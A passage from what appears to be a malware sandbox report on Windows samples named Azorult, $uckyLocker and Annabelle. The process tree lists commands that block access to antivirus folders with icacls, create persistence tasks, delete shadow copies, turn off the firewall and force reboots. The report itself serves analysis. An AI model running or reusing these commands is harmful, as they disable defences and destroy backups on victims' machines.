    3⤵
    PID:6064
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:680
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:64
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3688
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:5600
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5508
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5176
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:3732
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1972
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:5944
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4188
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:2416
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:4368
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:5648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:884
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3428
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:1796
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5360
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:5776
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Modifies file permissions
      PID:4752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1156
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:5180
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3412
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:5832
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1272
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5404
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1816
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:1664
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4256
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6064
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4740
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:928
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2156
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4916
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4368
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3012
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5304
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4784
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5200
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1508
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3004
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:980
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:704
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1172
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:4660
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1076
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:4360
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5576
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:1952
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2700
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:5180
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:6140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5832
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2560
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:232
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5200
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3904
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:6064
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:780
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5788
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2416
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3428
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:3384
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2640
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:1164
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1100
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3640
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Creates scheduled task(s)
    PID:5236
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5496
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5316
- C:\Users\Admin\Downloads\Azorult.exe
  "C:\Users\Admin\Downloads\Azorult.exe"
  2⤵
  - Executes dropped EXE
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
  2⤵
  PID:5608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3896 /prefetch:8
  2⤵
  PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=7156 /prefetch:8
  2⤵
  PID:4844
- C:\Users\Admin\Downloads\$uckyLocker.exe
  "C:\Users\Admin\Downloads\$uckyLocker.exe"
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  PID:1104
- C:\Users\Admin\Downloads\$uckyLocker.exe
  "C:\Users\Admin\Downloads\$uckyLocker.exe"
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  PID:5868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=collections --mojo-platform-channel-handle=4932 /prefetch:8
  2⤵
  PID:2792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:5208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6724 /prefetch:8
  2⤵
  PID:3688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3072911624993351660,4212024063276979739,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=6736 /prefetch:8
  2⤵
  PID:5780
- C:\Users\Admin\Downloads\Annabelle.exe
  "C:\Users\Admin\Downloads\Annabelle.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Disables RegEdit via registry modification
  - Sets file execution options in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - System policy modification
  PID:5876
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3284
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:344
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4744
- - C:\Windows\SYSTEM32\NetSh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:2780
- - C:\Windows\System32\shutdown.exe
    "C:\Windows\System32\shutdown.exe" -r -t 00 -f
    3⤵
    PID:1476
- C:\Users\Admin\Downloads\Annabelle.exe
  "C:\Users\Admin\Downloads\Annabelle.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Disables RegEdit via registry modification
  - Sets file execution options in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - System policy modification
  PID:6036
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1192
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1252
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3540
- - C:\Windows\SYSTEM32\NetSh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:6052
- - C:\Windows\System32\shutdown.exe
    "C:\Windows\System32\shutdown.exe" -r -t 00 -f
    3⤵
    PID:820
- C:\Users\Admin\Downloads\Annabelle.exe
  "C:\Users\Admin\Downloads\Annabelle.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Disables RegEdit via registry modification
  - Sets file execution options in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - System policy modification
  PID:3976
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5844
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2680
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4960
- - C:\Windows\SYSTEM32\NetSh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:3584
- C:\Users\Admin\Downloads\Annabelle.exe
  "C:\Users\Admin\Downloads\Annabelle.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Disables RegEdit via registry modification
  - Sets file execution options in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - System policy modification
  PID:5344
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4872
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4012
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3492
- - C:\Windows\SYSTEM32\NetSh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4992
- C:\Users\Admin\Downloads\Annabelle.exe
  "C:\Users\Admin\Downloads\Annabelle.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies Windows Defender Real-time Protection settings
  - UAC bypass
  - Disables RegEdit via registry modification
  - Sets file execution options in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - System policy modification
  PID:3512
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2344
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3732
- - C:\Windows\SYSTEM32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:5056
